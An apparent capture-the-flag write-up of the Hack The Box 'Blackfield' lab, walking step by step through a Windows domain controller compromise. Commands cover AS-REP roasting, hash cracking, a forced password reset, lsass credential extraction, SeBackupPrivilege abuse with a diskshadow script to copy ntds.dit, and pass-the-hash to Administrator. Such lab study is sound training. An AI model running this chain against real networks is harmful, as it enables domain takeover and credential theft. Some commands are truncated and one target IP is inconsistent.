Blackfield

Status Completed

URL https://www.youtube.com/watch?v=IfCysW0Od8w&t

Nmap Scan

[~] - hak101> nmap --min-rate 10000 -p- 10.10.10.192

Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-13 08:56 EDT
Nmap scan report for 10.10.10.192
Host is up (0.22s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
389/tcp open ldap
445/tcp open microsoft-ds
593/tcp open http-rpc-epmap
3268/tcp open globalcatLDAP
5985/tcp open wsman

[~] - hak101> nmap 10.10.10.192 -p 53,88,135,389,445,593,3268,5985 -sC -sV

-vv
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (ser
ver time: 2025-04-13 19:58:33Z)

Blackfield 1
 135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory
LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTT
P 1.0
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory
LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/
UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

These are the info we can find from the nmpa scan, we can add the domain name
to the /etc/hosts

nano /etc/hosts
10.10.10.192 BLACKFIELD.local BLACKFIELD.local.htb

Another thing we noticed in the machine was there was time difference

Since ldap and kerberos are present its likely it’s the DC
Let’s first enumerate the shares

[~] - hak101> netexec smb 10.10.10.192 -u '' -p '' --shares

Blackfield 2
 [~] - hak101> netexec smb 10.10.10.192 -u '.' -p '' --shares

We can see that when we try to get guest user shares there’s a profiles directory,
we can enumerate it further using smbclient tool

[~] - hak101> smbclient //10.10.10.192/profiles$ -U guest

Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> dir

We can see a bunch of users files, we can copy all the usernames and make a list

Blackfield 3
 Now we have made a list of usernames we can try to check for valid ones using
the kerbrute too

[~/HTB/Blackfeild] - hak101> ./kerbrute_linux_amd64 userenum -d blackfield.l

ocal --dc 10.10.10.192 users.txt -o new_users

We can also use GetNPUsers.py

[~/HTB/Blackfeild] - hak101> GetNPUsers.py blackfield.local/ -no-pass -users

file users.txt -dc-ip 10.10.10.192 | grep -v 'KDC_ERR_C_PRINCIPAL_UNKNOWN'

Blackfield 4
 We can see that we got a hash for the Kerberos user, next we can try to crack it

[~/HTB/Blackfeild] - hak101> hashcat -m 18200 hash-utf8.txt /usr/share/wordl

ists/rockyou.txt --force

We have cracked the hash

#00^BlackKnight

We can check for user shares

[~/HTB/Blackfeild] - hak101> netexec smb 10.10.10.192 -u 'support' -p '#00^Bl

ackKnight' --shares

Didn’t find anything new here, we can try to winrm to the machine

[~/HTB/Blackfeild] - hak101> netexec winrm 10.10.10.192 -u 'support' -p '#00^

BlackKnight'

Blackfield 5
 We cannot access the box with winrm, the next option is running bloodhound with
the credentials

[~/HTB/Blackfeild] - hak101> bloodhound-python -c ALL -u support -p '#00^B

lackKnight' -d blackfield.local -dc dc01.blackfield.local -ns 10.10.10.192

We have got the files needed for the bloodhound

Open bloodhound and drag and drop all the files

bloodhound

Blackfield 6
 Now drag and drop all the files

Blackfield 7
 When we check node info for the support user we can see that there’s one First

Degree Object Control

Blackfield 8
 We can see that we can force change the password to another user, we can do
this using rpcclient or AD tool called bloodyAD

I referred to this blog online for this process

https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword
Since i have bloodyAD installed i will be using it

[~] - hak101> bloodyAD --host "10.10.10.192" -d "blackfield.local" -u "support"

-p "#00^BlackKnight" set password "audit2020" "abc123"

It didn’t work because the password didn’t match the complexity

Blackfield 9
 [~] - hak101> bloodyAD --host "10.10.10.192" -d "blackfield.local" -u "support"
-p "#00^BlackKnight" set password "audit2020" "Abc@123#"

We can verify by netexec tool over smb

netexec smb 10.10.10.192 -u 'audit2020' -p 'Abc@123#'

We can see that the new credentials that we set worked, we can try winrm

authentication too

netexec winrm 10.10.10.192 -u 'audit2020' -p 'Abc@123#'

Unfortunately it didn’t work so we still don’t have access to the machine, next
thing we can do is check for shares

netexec smb 10.10.10.192 -u 'audit2020' -p 'Abc@123#' --shares

Blackfield 10
 We can see there’s a new directory named forensic, we can check what it
contains, we can use the smbget tool to get all the files from the forensic directory

[~/HTB/Blackfeild] - hak101> smbget --recursive -U "audit2020%Abc@123#"

"smb://10.10.10.192/forensic"

The tool took quite a bit of time to download all the .zip files from the
memory_analysis and we can see an interesting file named lsass.zip

We can dump plaintext credentials using mimikatz as it is used for dumping hashes
from lsass.exe , lets first unzip the file

[~/HTB/Blackfeild/memory_analysis] - hak101> unzip lsass.zip

Archive: lsass.zip
inflating: lsass.DMP

We got a file named lsass.dmp , now we can extract the contents of the file using
pypykatz

[~/HTB/Blackfeild/memory_analysis] - hak101> pypykatz lsa minidump lsass.D

MP

Blackfield 11
 We can see that we got the svc_backup user hash, we can check if we can
authenticate using this to the machine

[~/HTB/Blackfeild] - hak101> netexec smb 10.10.10.192 -u 'svc_backup' -H '9658d

We can see that the hashes worked, next we can try to use with winrm

[~/HTB/Blackfeild] - hak101> netexec winrm 10.10.10.192 -u 'svc_backup' -H '965

We can see that it is pawned! so we can use the evil-winrm tool to log in as the user

[~/HTB/Blackfeild] - hak101> evil-winrm -i 10.10.10.192 -u 'svc_backup' -H '9658d

We get shell access!

User Flag

*Evil-WinRM* PS C:\Users\svc_backup\Desktop> type user.txt

3920bb317a0bef51027e2852be64****

Privilege Escalation
https://www.youtube.com/watch?v=pWkWIa2dfHY&t=925s

When we check the user for privileges we can see the user has SeBackupPrivilege

Blackfield 12
 *Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /priv

This is the other case where we will need SeRestorePrivilege in order to work. As we
can see here we have both
Firstly, in the C:\ Directory, let's make a temp directory

*Evil-WinRM* PS C:\> mkdir temp

Excuse me for the error here, I renamed the file to temp

Now we need to install this repository

Blackfield 13
 https://github.com/giuliano108/SeBackupPrivilege

After installing, we can find these 2 files in the

SeBackupPrivilege/SeBackupPrivilegeCmdLets/bin/Debug of the tools folder. We need to transfer it

to the victim's machine /tmp folder that we created

We can upload the files using the upload command

*Evil-WinRM* PS C:\temp> upload SeBackupPrivilegeCmdLets.dll

*Evil-WinRM* PS C:\temp> upload SeBackupPrivilegeUtils.dll

Next, we need to install both modules

*Evil-WinRM* PS C:\temp> Import-Module .\SeBackupPrivilegeCmdLets.dll

*Evil-WinRM* PS C:\temp> Import-Module .\SeBackupPrivilegeUtils.dll

We will use a module named Copy-FileSeBackupPrivilege

Blackfield 14
 Copy-FileSeBackupPrivilege C:\Windows\ntds\ntds.dit C:\temp\ntds.dit

It didn’t work because we need to create a shadow copy, for this, we have a little
script in the kali machine

set context persistent nowriters

set metadata C:\temp\metadata.cab
set verbose on
add volume C: alias privesccopy
create
expose %privesccopy% X:

Save it as copy.txt , and run this command on the file to fix spacing and syntax
errors

[~/HTB/Blackfeild] - hak101> unix2dos copy.txt

Now let's upload this file to the victim's machine with the evil-winrm access

*Evil-WinRM* PS C:\temp> upload copy.txt

Blackfield 15
 Now we can execute

*Evil-WinRM* PS C:\temp> diskshadow /s copy.txt

Now we have successfully copied everything from the C drive to the X drive
Now we can copy the ntds.dit file from the X drive and save it to the C drive

Copy-FileSeBackupPrivilege X:\Windows\ntds\ntds.dit C:\temp\ntds.dit

This time, the command executed successfully

Now we can save the system file

Blackfield 16
 reg save hklm\system C:\temp\system.back

Now doing dir, these are the files that u will see in the /temp directory that we
created

Now we will download 2 files back to our kali machine

*Evil-WinRM* PS C:\temp> download ntds.dit

*Evil-WinRM* PS C:\temp> download system.back

Both are huge files, so it will take quite some time

Once we have downloaded both the files onto our Kali machine ,we can use
secretsdump.py to extract the hashes

secretsdump.py -ntds ntds.dit -system system.back local

Blackfield 17
 Now we have got all the users’ hashes, all the users in the domain! including the
DC hash
Now we can do pass the hash attack using the administrator hash to get root

[~/HTB/Blackfeild] - hak101> netexec winrm 10.10.10.192 -u 'Administrator' -H 184

[~/HTB/Blackfeild] - hak101> evil-winrm -i 10.10.11.42 -u 'Administrator' -H '184fb

Root Flag

*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt

4375a629c7c67c8e29db269060c9****

Blackfield 18